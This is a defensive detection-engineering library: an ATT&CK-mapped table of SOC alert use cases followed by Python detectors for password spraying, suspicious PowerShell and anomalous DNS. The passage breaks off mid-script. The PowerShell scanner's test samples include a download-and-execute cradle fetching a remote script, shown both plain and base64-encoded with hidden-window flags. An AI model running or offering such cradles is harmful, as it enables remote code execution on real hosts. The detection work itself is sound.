Use Case Library

ATT&CK Tactic | ATT&CK Technique | Use Case Name | Threat | Description | Generic Tools
--- | --- | --- | --- | --- | ---
Initial Access | Hardware Additions | Unauthorized Device on Network | Physical Access | Non-corporate device connected to corporate network | Switches, Routers
Initial Access | Hardware Additions | Unique OUI (Organizationally Unique Identifier) | Physical Access | MAC address connected to network with an Organizationally Unique Identifier (OUI) not seen before | Switches, Routers
Initial Access | Hardware Additions | Unauthorized storage device | Malware | Unauthorized USB/disc/etc. | Endpoint Protection, Microsoft-Windows-DriverFrameworks-UserMode/Operational (transaction on UMDF host process)
Initial Access | Valid Accounts | Improbable Travel | Account Compromise | Improbable distance between remote logins based on geo-IP | Cloud Mail, VPN, VDI, IDAM, NPS
Initial Access | Valid Accounts | Unauthorized IP access | Account Compromise | User logon from risky IP or a country where no business exists | Cloud Mail, VPN, VDI, IDAM, NPS
Initial Access | Valid Accounts | Inactive User Account | Account Compromise | Active account with last accessed time > 30 days | AD, OIM
Initial Access | Valid Accounts | Local Admin / Domain Admin Logon to workstation | Account Compromise | Domain or local admin account logon directly to device | Windows 4624
Initial Access | Valid Accounts | User Logon Time | Account Compromise | User logons between 1am and 4am local time | Windows 4624
Initial Access | Valid Accounts | Local authentication | Account Compromise | Use of local authentication after machine is attached to domain | Windows 528, Unix secure log
Initial Access | Exploit Public-Facing Application | SQL Injection: URI/URL Length | Web App Attacks | Long URI/URL length (> 250) | Web Servers
Initial Access | Exploit Public-Facing Application | SQL Injection: URI Pattern Match | Web App Attacks | URI pattern match (SELECT/DELETE/UPDATE) | Web Servers
Initial Access | Exploit Public-Facing Application | SQL Injection: 500 HTTP Status Codes | Web App Attacks | 500 HTTP status codes | Web Servers
Initial Access | Exploit Public-Facing Application | SQL Injection: IIS Command Execution | Web App Attacks | IIS command execution | IIS
Initial Access | Exploit Public-Facing Application | Repeated Exploit Attempts | Web App Attacks | Repeated exploit attempts per application | Web Servers, WAF
Initial Access | Exploit Public-Facing Application | New User Agent | Web App Attacks | User agent not seen before (whitelist) | Web Servers
Initial Access | Spearphishing Attachment | Suspicious Email | Phishing | Email from IP address (not domain) or email with attachment from first-time sender | Mail
Initial Access | Spearphishing Link | Internal Phishing | Lateral Movement | Excessive emails sent from internal user/system | Mail
Initial Access | Drive-by Compromise | Unique host file entry | Malware | Long tail analysis on local hosts file | Custom script
Initial Access | Hardware Additions | ARP Cache Poisoning | Malware | New MAC address in ARP table | Custom script
Initial Access | * | Suspicious File Download Source | Malware | File download from high-risk domain, WordPress site, root directory, hardcoded IP, or randomly generated domain | Proxy
Initial Access | * | Suspicious File Extension Downloaded | Malware | File downloaded with no extension or double extension | Proxy
Initial Access | Exploit Public-Facing Application | SQL Injection | Data Exfiltration | SQL SELECT injection | Database
Initial Access | Hardware Additions | WAP connected to Wired Network | Physical Access | Unauthorized wireless access point connected to the network | Network Scanner
Initial Access | Valid Accounts | Abnormal account usage | Account Compromise | Alert when users deviate from normal login behavior, such as time-of-day, workstation location and duration | Windows 4624
Execution | Local Job Scheduling | Scheduled Tasks | Lateral Movement | Unix crontab events | Custom script
Execution | Local Job Scheduling | Suspicious Scheduled Task Created | Lateral Movement | Suspicious scheduled task created | Windows 602/4698
Execution | Local Job Scheduling | Suspicious Scheduled Task Deleted | Lateral Movement | Scheduled task quickly created then deleted | Windows 602/4698/4699
Execution | Local Job Scheduling | Scheduled Tasks | Lateral Movement | at.exe running on system (schedules commands to run) | Windows 4688
Execution | * | File Sandboxing | Malware | Malicious file detected by sandbox | Sandbox Tool
Execution | * | Host-Based Intrusion Prevention System | Malware | HIDS alert | HIDS
Execution | * | Recurring Malware Threat | Malware | Multiple malware alerts on single machine; different malware | Endpoint Protection
Execution | * | Recurring Malware Threat Loader | Malware | Multiple malware alerts on single machine; same malware | Endpoint Protection
Execution | * | Recurring Malware Threat | Malware | Multiple malware alerts on multiple machines; same malware | Endpoint Protection
Execution | * | Heuristic Malware | Malware | Heuristic malware detection | Endpoint Protection
Execution | * | Malware not blocked | Malware | Malware not quarantined or deleted | Endpoint Protection
Execution | * | Malware blocked | Malware | Malware blocked on critical system | Endpoint Protection
Execution | * | Malware PUP | Malware | Potentially Unwanted Program | Endpoint Protection
Execution | * | Ransomware upload | Malware | Ransomware-infected file uploaded to cloud | O365
Execution | * | Watering Hole | Malware | Multiple infected devices in same site within 48 hours | Endpoint Protection
Execution | PowerShell | Encoded PowerShell | Malware | Base64 encoded commands ("-enc") or a match on the regex (?<base64_code>[A-Za-z0-9+/]{50,}[=]{0,2}) | PowerShell Transcription
Execution | PowerShell | Non-Interactive PowerShell | Malware | "-NonI": non-interactive; run command without showing prompt | PowerShell Script Block
Execution | PowerShell | No Profile PowerShell | Malware | "-NoP": no profile | PowerShell Script Block
Execution | PowerShell | Long PowerShell command | Malware | Long command line (> 500 characters) | PowerShell Script Block
Execution | PowerShell | PowerShell code download | Malware | Execution of downloaded code ("iex" + "Net.WebClient") | PowerShell Script Block
Execution | PowerShell | Known bad PowerShell commands | Malware | Known bad commands (wmi, dll, etc.) | PowerShell Script Block
Execution | PowerShell | New PowerShell cmdlet | Malware | PowerShell cmdlet not seen before | PowerShell Script Block
Execution | PowerShell | Unique PowerShell invocation | Malware | PowerShell invoked outside of powershell.exe (Sysmon) | PowerShell Script Block
Execution | * | New application install | Malware | First time application installed on any Hershey device | Windows AppLocker, Windows 11707
Execution | * | Blocked application install | Malware | Software installation blocked | Windows AppLocker, Windows 11707
Execution | Exploitation for Client Execution | Worm Activity | Lateral Movement | Excessive number of unique host/port connections from user device | Netflow
Execution | Exploitation for Client Execution | Worm Activity | Lateral Movement | Multiple infected devices in same subnet within 48 hours | Endpoint Protection
Execution | * | Hack Tools | Lateral Movement | Hack tool installed or run | Endpoint Protection
Execution | * | Suspicious Process Executed | Lateral Movement | Suspicious process executed on a critical host (certutil, etc.) | Windows 4688
Execution | * | Remote Execution | Lateral Movement | Use of Remote Execution Tool (RET) | Endpoint Protection
Execution | * | IDS detection | Lateral Movement | IDS detecting an attack based on a known signature | IDS
Persistence | * | Uncontrolled Change | Malware | Configuration change from baseline | MBSA
Persistence | Valid Accounts | Run As | Lateral Movement | Windows events: runas | Windows 4648
Persistence | Valid Accounts | Misnamed New User Accounts | Account Compromise | New user account created outside of naming convention | Windows 4720
Persistence | Valid Accounts | Deactivated Account | Account Compromise | Monitor attempts to access deactivated accounts through audit logging | IDAM
Persistence | Valid Accounts | Rapid Account Creation | Account Compromise | Rapid account creation | Windows 4720
Persistence | Valid Accounts | Malicious Account Creation | Account Compromise | Account created not by designated service account | Windows 4720
Persistence | Create Account | Local User or Group Created | Malware | New local user or group created | Unix auth.log (groupadd/useradd/chfn), Windows 4720/4722
Persistence | Create Account | Short-lived account | Account Compromise | Account created and deleted within a day | Windows 4720, 4725, 4726
Persistence | Valid Accounts | Unassociated Account | Account Compromise | Account that cannot be associated with a business process or business owner | IDAM
Privilege Escalation | Valid Accounts | Password Hashes | Account Compromise | Access denied to passwd or shadow | Unix secure log
Privilege Escalation | Valid Accounts | Root Credential Exposure | Account Compromise | Direct access to root user | Windows 4624, Unix secure log
Privilege Escalation | Valid Accounts | Outdated Authentication | Account Compromise | NTLM authentication to remote system (failed Kerberos) | Windows 4624 (authentication package NTLM), 4822, 4823
Privilege Escalation | Valid Accounts | Kerberos Encryption Downgrade | Account Compromise | Kerberos encryption downgrade | Custom script
Privilege Escalation | Valid Accounts | Sensitive Security Groups | Account Compromise | User added to sensitive local or global security group | Windows 4732/4728
Privilege Escalation | Valid Accounts | Sudo Access Denied | Account Compromise | User denied sudo access | Unix secure log
Privilege Escalation | Valid Accounts | Unauthorized user to Azure Admin Group | Account Compromise | User added to admin group in Azure AD by a user not authorized to make changes | Azure
Privilege Escalation | Valid Accounts | Unauthorized Assignment of Delegate Mailbox Permissions | Account Compromise | User assigned delegate mailbox permissions by a user who is unauthorized to grant such privileges | Mail
Privilege Escalation | Startup Items | Unique Autoruns | Malware | Long tail analysis on autoruns | Autoruns
Privilege Escalation | File System Permissions Weakness | Take Ownership | Data Compromise | User running dangerous "Take Ownership" action | Windows 4670
Defense Evasion | File Deletion | Audit Log Cleared | Covering Tracks | Windows security log cleared | Windows 517/1104/104/1102
Defense Evasion | Modify Registry | Registry Modification | Lateral Movement | Modification of critical registry keys/values in HKLM/HKCU | WinRegMon, Windows 4657
Defense Evasion | Obfuscated Files or Information | Timestamp Modification or Anomaly | Covering Tracks | Incoming logs from previous day or future time | ALL
Defense Evasion | Process Doppelgänging | Unique Running Processes | Malware | Long tail analysis on processes | Microsoft Sysmon
Defense Evasion | Rootkit | Rootkits | Malware | Change to OS binaries outside of patches | FIM
Defense Evasion | Install Root Certificate | Unique certificate added | Malware | Long tail analysis on local certificate store | Custom script
Credential Access | Network Sniffing | Promiscuous Mode Network Sniffing | Physical Access | Empty result in CAM table indicates device listening in promiscuous mode | Switches
Credential Access | Brute Force | Password Exploit Tool Login | Account Compromise | Logon attempt using a password exploit tool. Some tools leave artifacts that indicate misuse of authentication; detect by matching the tool's random-looking artifacts with a regex | Windows 4625/4624
Credential Access | Kerberoasting | Kerberoasting / Domain Enumeration | Account Compromise | Excessive Kerberos service tickets requested | Windows 4769
Credential Access | Brute Force | Excessive Account Lockouts From Endpoint | Account Compromise | Excessive account lockouts from endpoint | Windows 4740
Credential Access | Brute Force | Excessive User Account Lockouts | Account Compromise | Excessive user account lockouts | Windows 4740
Credential Access | Brute Force | Brute Force Login Attempts | Account Compromise | Excessive failed logons | Windows 4625
Credential Access | Brute Force | Anomalous Failed Logons | Account Compromise | Z-score deviation from baseline failed logons/day | IDAM
Credential Access | Brute Force | Service Account Failed Logons | Account Compromise | Excessive failed logons from service account | IDAM
Credential Access | Brute Force | Password Spraying | Account Compromise | Failed logons from multiple accounts on same device: single IP address attempting more than 1 unique username on a non-domain controller (5+) or domain controller (20+) within 3 minutes | IDAM
Credential Access | Brute Force | Invalid Service Account Logon | Account Compromise | Service account logon to non-service-related system (vuln scanner account authenticating from a non-vuln-scanner host). Look for service accounts authenticating from workstations | Windows 4624
Credential Access | Brute Force | Remote Desktop | Lateral Movement | Failed Remote Desktop logon attempts | Windows 4825
Discovery | Account Discovery | Group auditing | Lateral Movement | Reading member information from sensitive AD group | Windows 4662
Discovery | File and Directory Discovery | File Access | Lateral Movement | Failed attempt to access a file share | Windows 4663, 5145
Discovery | File and Directory Discovery | Access Testing | Account Compromise | Excessive authentication attempts against multiple file shares | Windows 4663
Discovery | Network Service Scanning | Unknown Vulnerability Scanning Activity | Vulnerability Scanning | Internal or external vulnerability scanning from unknown source | Endpoint Protection, Firewall, IDS, IPS
Discovery | Network Share Discovery | Network Share Scan | Reconnaissance | Multiple network share access attempts from internal host | Windows 5140
Discovery | Network Share Discovery | Permission Denied to Resource | Reconnaissance | Permission denied when attempting to access network resource | Microsoft Sysmon
Discovery | File and Directory Discovery | Cyber Deception Honey Token Accessed | Data Compromise | Honey token accessed or used | Endpoint Protection
Lateral Movement | * | Workstation to Workstation Communication | Unauthorized Access | Network communication directly between workstations | Netflow
Lateral Movement | Valid Accounts | Successful Logon Multiple Devices | Account Compromise | Non-technical user logged onto multiple machines within 24 hours | Windows 4624
Lateral Movement | Valid Accounts | PSExec Pivoting | Malware | PsExec from new source or to new destination | Windows 7045/4697/5140
Lateral Movement | * | Internal Device Blocked | Lateral Movement | Blocked traffic from internal device | Endpoint Protection, Firewall, IDS, IPS
Lateral Movement | Valid Accounts | Service Account Compromise | Account Compromise | Direct SSH logon / interactive logon using service account credentials | Unix secure log, Windows 4624
Lateral Movement | Valid Accounts | Excessive Successful Logons | Account Compromise | Excessive successful logons from non-service account | IDAM
Lateral Movement | Valid Accounts | Unauthorized Executive Machine Access | Account Compromise | Logon to executive machine from a non-executive account | Windows 4624
Lateral Movement | Pass the Hash | Pass the Hash | Lateral Movement | Logon event not from the network domain; entropy (randomness) in source workstation name | Windows 4624
Collection | Data from Information Repositories | Unauthorized eDiscovery Action | Account Compromise | eDiscovery action taken by user not authorized to interact with eDiscovery | Mail
Exfiltration | Exfiltration Over Alternative Protocol | Anomalous HTTP requests | Denial of Service | Anomalous number of HTTP requests by HTTP method | Web Servers
Exfiltration | Data Encrypted | Unauthorized Encryption | Data Exfiltration | Unauthorized use of encryption (not decryptable by inspection tools) | Packet Inspection tools
Exfiltration | Exfiltration Over Alternative Protocol | Anomalous File Transfer | Data Exfiltration | File transport over uncommon protocol | Proxy, Firewall
Exfiltration | Exfiltration Over Alternative Protocol | "Naked" Hard Coded IP | Malware | Direct IP calls to internet via DNS or HTTP (can filter out trusted ASNs using domain_stats.py whois lookup or an ASN lookup table) | Proxy
Exfiltration | Exfiltration Over Command and Control Channel | Large Outbound Transfer | Data Exfiltration | Large outbound transfer | Proxy, Firewall, Netflow, IDS
Exfiltration | Exfiltration Over Command and Control Channel | Unbalanced bytes outbound | Data Exfiltration | More bytes uploaded than downloaded from source over 24 hours | Proxy, Firewall, Netflow, IDS
Exfiltration | Exfiltration Over Command and Control Channel | Anomalous network connections | Data Exfiltration | Anomalous network connections between devices on the same subnet (1 out of 15 HR systems spikes in bytes uploaded) | Proxy, Firewall, Netflow, IDS
Exfiltration | Exfiltration Over Command and Control Channel | Repeated bytes outbound | Data Exfiltration | Repeated bytes out | IDS, Firewall
Exfiltration | Exfiltration Over Alternative Protocol | HTTP Data Exfiltration | Data Exfiltration | HTTP PUT or POST to non-approved site, threat domain, hardcoded IP, pastebin | Proxy, Firewall, IDS
Exfiltration | Exfiltration Over Command and Control Channel | Peer to Peer (P2P) Traffic | Data Exfiltration | Peer to peer (P2P) traffic detected | IDS, Firewall
Exfiltration | Exfiltration Over Command and Control Channel | Unauthorized Proxy | Data Exfiltration | XFF traffic from unauthorized proxy | IDS
Exfiltration | Exfiltration Over Alternative Protocol | DNS Tunneling | Data Exfiltration | Variance of DNS traffic volume from host; TXT/CNAME/MX records from abnormal host; variance in DNS request length; variability in frequency of requests; randomness in domain names; variance in volume of NXDOMAIN requests | DNS
Exfiltration | Exfiltration Over Alternative Protocol | SMTP Tunneling | Data Exfiltration | Exfil over SMTP (SMTP traffic NOT sent to Microsoft) | IDS, Firewall
Exfiltration | Exfiltration Over Alternative Protocol | ICMP Tunneling | Data Exfiltration | Exfil over ICMP (abnormal ICMP size / lengthy ICMP session) | IDS, Firewall
Exfiltration | Exfiltration Over Command and Control Channel | Cloud File Download | Data Exfiltration | Excessive file downloads from cloud storage | Mail
Exfiltration | Exfiltration Over Command and Control Channel | Outbound to Risky IP (C2) | Data Exfiltration | Outbound connection to bad domain, IP (C2) or non-business country | Proxy, Firewall, IDS
Exfiltration | Exfiltration Over Command and Control Channel | BitTorrent | Data Exfiltration | Outbound BitTorrent traffic | Proxy, Firewall, IDS
Exfiltration | Exfiltration Over Alternative Protocol | HTTP C2 | Data Exfiltration | Excessive volume of HTTP POST commands | Proxy, Firewall, IDS
Exfiltration | Exfiltration Over Command and Control Channel | Data Loss Protection | Data Compromise | Data Loss Protection alerts reviewed | DLP
Exfiltration | Exfiltration Over Alternative Protocol | Hidden File Transfer | Data Compromise | Outbound file transfer on an unrelated port that is commonly allowed through outbound ACLs: file transfer using ftp/ssh/sftp/tftp/telnet/ftps, but not on port 20, 21, 22, 23, 69, 115, 990 or 989 | Firewall, IDS
Command and Control | Remote Access Tools | Remote Administration | Lateral Movement | Unauthorized remote admin tools (VNC) | Endpoint Protection, Microsoft AppLocker
Command and Control | Commonly Used Port | Unauthorized Protocol Communication | Malware | Protocol communication to unauthorized server (DNS, NTP, SQL traffic to devices that don't host the service) | Netflow
Command and Control | * | Anomalous connection | Malware | Z-score deviation in number, length, or volume of network connections | Proxy, Firewall, IDS
Command and Control | * | Increased Connections | Outbound Connections | Spike in number of destination IP network connections by source IP | Netflow
Command and Control | * | Persistent Connections | Outbound Connections | Persistent connections (> 4 hours) not including VPN, backup, screen share, etc. | Netflow
Command and Control | * | Fast Flux | Outbound Connections | DNS query for new domain (last 3 months) excluding Alexa Top 1M | DNS
Command and Control | * | Beaconing | Outbound Connections | Beaconing system | IDS, Firewall, DNS, RITA, persistent.pl, Flare
Command and Control | * | Anonymization Service | Outbound Connections | Usage of anonymization services (Tor, etc.) | Proxy, Firewall, IDS, DNS
Command and Control | * | High-risk VPN | Outbound Connections | VPN logins from suspicious locations | VPN
Command and Control | * | High-risk IP | Outbound Connections | Communication with external IP/service on threat list | Proxy, Firewall, IDS, Netflow
Command and Control | * | New DNS Request | Outbound Connections | DNS request for domain not previously requested (dynamic whitelist) | DNS
Command and Control | * | WPAD DNS Request | Outbound Connections | DNS resolution for unauthorized WPAD proxy (wpad.*) | DNS
Command and Control | * | NTP DNS Request | Outbound Connections | DNS resolution for unauthorized NTP server (time.*, ntp.*) | DNS
Command and Control | * | Update Server DNS Request | Outbound Connections | DNS resolution for unauthorized Windows Update server (not SCCM) | DNS
Command and Control | * | Failed DNS | Outbound Connections | Excessive failed DNS queries | DNS
Command and Control | * | Repetitive DNS | Outbound Connections | Repetitive DNS calls with TTLs < 300, answers with reply record count > 12, persistent callbacks | DNS
Command and Control | * | External DNS | Outbound Connections | DNS query to external DNS server (non-Infoblox DNS traffic) | IDS, Firewall
Command and Control | * | DGA | Outbound Connections | Communication with dynamically generated domain (high entropy) | Proxy, DNS, Netflow, IDS, freq.py
Command and Control | * | Fuzzy Domains | Outbound Connections | Communication to/from domain similar to company brand (her5heys.com) via DNS, HTTP, email | DNS, Proxy, Netflow, IDS
Command and Control | * | Loopback DNS | Command and Control | DNS responses to loopback, RFC 1918 space/bogon space | DNS
Command and Control | * | Teredo DNS | Command and Control | Teredo IPv6 DNS query | DNS
Command and Control | * | Excessive GET requests | Command and Control | 400+ GET requests per minute by source | Proxy
Command and Control | * | Excessive POST requests | Command and Control | 200+ POST requests per minute by source | Proxy
Command and Control | * | Excessive 404 errors | Command and Control | 10+ 404 errors per 30 minutes by source | Web Servers, Proxy, IDS, Firewall
Command and Control | * | Variation of 200 status codes | Command and Control | Standard deviation in 200 status codes | Web Servers, Proxy, IDS, Firewall
Command and Control | * | Self-Signed SSL Certificate | Command and Control | Self-signed SSL certificate | Proxy, IDS
Command and Control | * | Suspicious x509 SSL Certificate | Command and Control | Missing fields (country, organization, OU, location); new issuer (build baseline); valid for more than 1096 days; odd fields (invalid US state, invalid country, common name missing a period); high entropy common name (freq.py) | Proxy, IDS, freq.py
Command and Control | * | New Listening Port | Malware | New port listening on device | Network Scanner
Persistence | * | Malware Backdoor | Malware | Service account starting unique process | Windows 4688
Command and Control | Uncommonly Used Port | Unauthorized Port/Service/Protocol | Vulnerability Exploit | Unauthorized port, service, or protocol detected on a system. Long-tail analysis; be more suspicious of new services on workstations | Windows 7045, Netflow, Network Scanner, Microsoft Sysmon
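The Password Spraying row is one of the few in the library that states concrete thresholds: a single source IP trying more than one unique username within 3 minutes, alerting at 5+ usernames against a non-domain controller or 20+ against a domain controller. The Python below is an added example, not part of the library, that applies exactly those thresholds to constructed Windows 4625 (failed logon) events with a sliding window. The event tuples, the host names and the "dc"/"workstation" role tag (which in practice would come from a CMDB or AD lookup) are assumptions for illustration.

```python
"""Password-spray detection over Windows 4625 (failed logon) events.

Thresholds are the library's: one source IP trying more than one unique
username within 3 minutes, flagged at 5+ usernames against a non-domain
controller or 20+ against a domain controller.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=3)
THRESHOLD = {"dc": 20, "workstation": 5}   # distinct usernames per IP/host inside WINDOW

# Constructed sample events (not real telemetry): 4625 TimeCreated, IpAddress,
# TargetUserName, target computer, and an assumed host-role tag from the CMDB.
SAMPLE_4625 = [
    # one user mistyping a password: a single username is never a spray
    ("2024-01-10 09:00:01", "10.0.7.11", "alice", "WS02", "workstation"),
    ("2024-01-10 09:00:09", "10.0.7.11", "alice", "WS02", "workstation"),
    ("2024-01-10 09:00:20", "10.0.7.11", "alice", "WS02", "workstation"),
    # spray against a workstation: 5 distinct names in 100 seconds
    ("2024-01-10 09:05:00", "10.0.5.23", "bob",   "WS01", "workstation"),
    ("2024-01-10 09:05:20", "10.0.5.23", "carol", "WS01", "workstation"),
    ("2024-01-10 09:05:40", "10.0.5.23", "dave",  "WS01", "workstation"),
    ("2024-01-10 09:06:05", "10.0.5.23", "erin",  "WS01", "workstation"),
    ("2024-01-10 09:06:40", "10.0.5.23", "frank", "WS01", "workstation"),
    # the same 5 names against a domain controller: below the DC threshold of 20
    ("2024-01-10 09:10:00", "10.0.9.4", "bob",   "DC01", "dc"),
    ("2024-01-10 09:10:10", "10.0.9.4", "carol", "DC01", "dc"),
    ("2024-01-10 09:10:20", "10.0.9.4", "dave",  "DC01", "dc"),
    ("2024-01-10 09:10:30", "10.0.9.4", "erin",  "DC01", "dc"),
    ("2024-01-10 09:10:40", "10.0.9.4", "frank", "DC01", "dc"),
    # 5 distinct names but 3 minutes apart: never 5 inside one window
    ("2024-01-10 09:20:00", "10.0.5.99", "gina", "WS03", "workstation"),
    ("2024-01-10 09:23:00", "10.0.5.99", "hank", "WS03", "workstation"),
    ("2024-01-10 09:26:00", "10.0.5.99", "ivan", "WS03", "workstation"),
    ("2024-01-10 09:29:00", "10.0.5.99", "judy", "WS03", "workstation"),
    ("2024-01-10 09:32:00", "10.0.5.99", "kate", "WS03", "workstation"),
]
# a 20-name spray against the DC, one attempt every 3 seconds
SAMPLE_4625 += [
    (f"2024-01-10 09:40:{3 * i:02d}", "10.0.9.5", f"user{i:02d}", "DC01", "dc")
    for i in range(20)
]


def parse_events(rows):
    """Turn raw tuples into (timestamp, ip, username, host, role); usernames are case-folded."""
    return [
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), ip, user.lower(), host, role)
        for ts, ip, user, host, role in rows
    ]


def detect_spray(events, window=WINDOW, thresholds=THRESHOLD):
    """Return one alert per (ip, host) whose distinct-username count inside any
    `window` reaches the threshold for the host's role.

    Each alert is (ip, host, sorted usernames, window start time)."""
    attempts = defaultdict(list)
    for ts, ip, user, host, role in events:
        attempts[(ip, host, role)].append((ts, user))
    alerts = []
    for (ip, host, role), items in attempts.items():
        items.sort()
        limit = thresholds[role]
        start = 0
        for end in range(len(items)):
            # slide the left edge so the window spans at most `window`
            while items[end][0] - items[start][0] > window:
                start += 1
            users = {u for _, u in items[start:end + 1]}
            if len(users) >= limit:
                alerts.append((ip, host, tuple(sorted(users)), items[start][0]))
                break  # one alert per source/target pair is enough
    return alerts


if __name__ == "__main__":
    for ip, host, users, since in detect_spray(parse_events(SAMPLE_4625)):
        print(f"{since} spray from {ip} against {host}: {len(users)} usernames")
```

Run as written, only the two sprays alert: the 5-name run against WS01 and the 20-name run against DC01. The 5 names thrown at the DC stay silent because the DC threshold is 20, and the 5 names spread over 12 minutes never co-occur inside a 3-minute window. Keying on (ip, host) rather than on ip alone is what lets the per-role threshold apply; if the source IP is a NAT gateway or VPN concentrator, expect to key on the logon workstation name instead.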

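The PowerShell rows (Encoded PowerShell, Non-Interactive PowerShell, No Profile PowerShell, Long PowerShell command, PowerShell code download) each describe a string or regex match on the command line or script block. The Python below is an added example, not part of the library, that turns those five rows into one scanner and runs it over constructed command lines. It reuses the library's own base64 pattern, rewritten with Python's `(?P<name>...)` named-group syntax, and goes one step beyond the rows: a matching base64 blob is decoded as UTF-16LE (the encoding `-EncodedCommand` expects) and the decoded payload is scanned too, so an encoded download cradle is still caught. Accepting the short switch aliases `-e`, `-ec`, `-nop` and `-noni` alongside the long forms is also an addition; PowerShell resolves either. The sample lines and the documentation-range IP addresses in them are constructed.

```python
"""Score PowerShell command lines against the library's PowerShell use cases:
encoded commands, -NonInteractive, -NoProfile, over-long lines and the
IEX + Net.WebClient download cradle. The base64 pattern is the library's own,
in Python named-group syntax."""
import base64
import binascii
import re

LONG_COMMAND = 500   # characters, from the library
BASE64_BLOB = re.compile(r"(?P<base64_code>[A-Za-z0-9+/]{50,}={0,2})")
RULES = {
    # the (?<![\w-]) lookbehind stops '-e' matching inside words such as 'Write-Output'
    "encoded": re.compile(r"(?i)(?<![\w-])-e(c|nc|ncodedcommand)?\b"),
    "non_interactive": re.compile(r"(?i)(?<![\w-])-noni(nteractive)?\b"),
    "no_profile": re.compile(r"(?i)(?<![\w-])-nop(rofile)?\b"),
    "download_cradle": re.compile(
        r"(?i)\b(iex|invoke-expression)\b.*net\.webclient"
        r"|net\.webclient.*\b(iex|invoke-expression)\b"),
}


def decode_blobs(line):
    """Decode every base64 run in `line` as UTF-16LE, which is what
    -EncodedCommand expects. Runs that are not valid base64 are skipped."""
    out = []
    for m in BASE64_BLOB.finditer(line):
        try:
            raw = base64.b64decode(m.group("base64_code"), validate=True)
        except (binascii.Error, ValueError):
            continue
        out.append(raw.decode("utf-16-le", errors="replace"))
    return out


def scan(line):
    """Return the set of rule names the command line (and any decoded payload) triggers."""
    hits = set()
    if len(line) > LONG_COMMAND:
        hits.add("long_command")
    if BASE64_BLOB.search(line):
        hits.add("base64_blob")
    # scan the decoded payload alongside the raw line
    text = "\n".join([line, *decode_blobs(line)])
    for name, pattern in RULES.items():
        if pattern.search(text):
            hits.add(name)
    return hits


# Constructed samples (not captured telemetry). The encoded payload is built
# here so the base64 is exact; 198.51.100.7 and 203.0.113.5 are documentation addresses.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLES = [
    f"powershell.exe -NoP -NonI -W Hidden -Enc {ENCODED}",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x')\"",
    'powershell.exe -Command "' + "Write-Output 'tick';" * 30 + '"',
    "powershell.exe -NoProfile -Command Get-Service",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(sorted(scan(line)) or "clean", "<-", line[:70])
```

The first sample is the classic one-liner and trips five rules at once, the cradle only becoming visible after decoding. The `-ExecutionPolicy Bypass -File` line is deliberately clean here: `-e` is only matched as a whole switch, so `-ExecutionPolicy` does not count as `-EncodedCommand`. Whether `-NoProfile` on its own deserves an alert, as the fifth sample shows, depends on how many of your own automation scripts use it; that row is a candidate for an allow-list of known launch paths.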
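Three DNS rows lean on the same idea of randomness in names: DGA ("dynamically generated domain (high entropy)"), Fuzzy Domains (a brand lookalike such as her5heys.com) and DNS Tunneling (TXT/CNAME/MX queries, long requests, random labels, NXDOMAIN churn). The Python below is an added example, not part of the library, that computes Shannon entropy and edit distance itself and applies them to a constructed DNS query log. Every threshold constant, the brand list, and the naive "label left of the TLD" rule for the registered domain are assumptions for illustration; in production the last would be a public-suffix-list lookup so that names under co.uk and similar suffixes are not misread.

```python
"""DNS log triage for three library rows: DGA (high-entropy names), Fuzzy
Domains (brand lookalikes) and DNS Tunneling (TXT/CNAME/MX queries carrying
long random labels, plus the NXDOMAIN churn a DGA client produces)."""
import math
from collections import Counter, defaultdict

BRANDS = ["hersheys"]                     # assumed brand labels to protect
DGA_MIN_LEN, DGA_MIN_ENTROPY = 10, 3.3    # assumed thresholds; tune per environment
LOOKALIKE_MAX_DISTANCE = 2
TUNNEL_TYPES = {"TXT", "CNAME", "MX", "NULL"}
TUNNEL_QNAME_LEN, TUNNEL_LABEL_ENTROPY = 40, 3.5
TUNNEL_SHARE = NXDOMAIN_SHARE = 0.5


def shannon_entropy(s):
    """Bits per character; a label using all 16 hex digits once scores exactly 4.0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def levenshtein(a, b):
    """Edit distance via the usual two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registered_label(qname):
    """Label left of the TLD. Assumes a one-label public suffix (see lead-in)."""
    labels = qname.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def classify_domain(qname, brands=BRANDS):
    """'dga' for a long, high-entropy registered label; 'lookalike' for a label
    within LOOKALIKE_MAX_DISTANCE edits of a brand that is not the brand itself."""
    label = registered_label(qname)
    tags = set()
    if len(label) >= DGA_MIN_LEN and shannon_entropy(label) >= DGA_MIN_ENTROPY:
        tags.add("dga")
    if any(label != b and levenshtein(label, b) <= LOOKALIKE_MAX_DISTANCE for b in brands):
        tags.add("lookalike")
    return tags


def host_profiles(records):
    """records: (source host, qname, qtype, rcode). Returns per-host counters and flags."""
    per_host = defaultdict(list)
    for host, qname, qtype, rcode in records:
        per_host[host].append((qname, qtype, rcode))
    profiles = {}
    for host, qs in per_host.items():
        n = len(qs)
        # tunnel-shaped: a data-carrying record type, or a long name whose first label is random
        tunnel_like = sum(1 for q, t, _ in qs if t in TUNNEL_TYPES or (
            len(q) >= TUNNEL_QNAME_LEN and shannon_entropy(q.split(".")[0]) >= TUNNEL_LABEL_ENTROPY))
        nxdomain = sum(1 for _, _, r in qs if r == "NXDOMAIN")
        tags = [classify_domain(q) for q, _, _ in qs]
        dga = sum("dga" in t for t in tags)
        flags = set()
        if tunnel_like / n >= TUNNEL_SHARE:
            flags.add("tunneling")
        if nxdomain / n >= NXDOMAIN_SHARE and dga >= 2:
            flags.add("dga_host")
        if any("lookalike" in t for t in tags):
            flags.add("lookalike")
        profiles[host] = {"queries": n, "tunnel_like": tunnel_like,
                          "nxdomain": nxdomain, "dga_domains": dga, "flags": flags}
    return profiles


# Constructed sample log (not real traffic). Each HEX16 entry is a permutation
# of the 16 hex digits, so every data label has exactly 4.0 bits of entropy.
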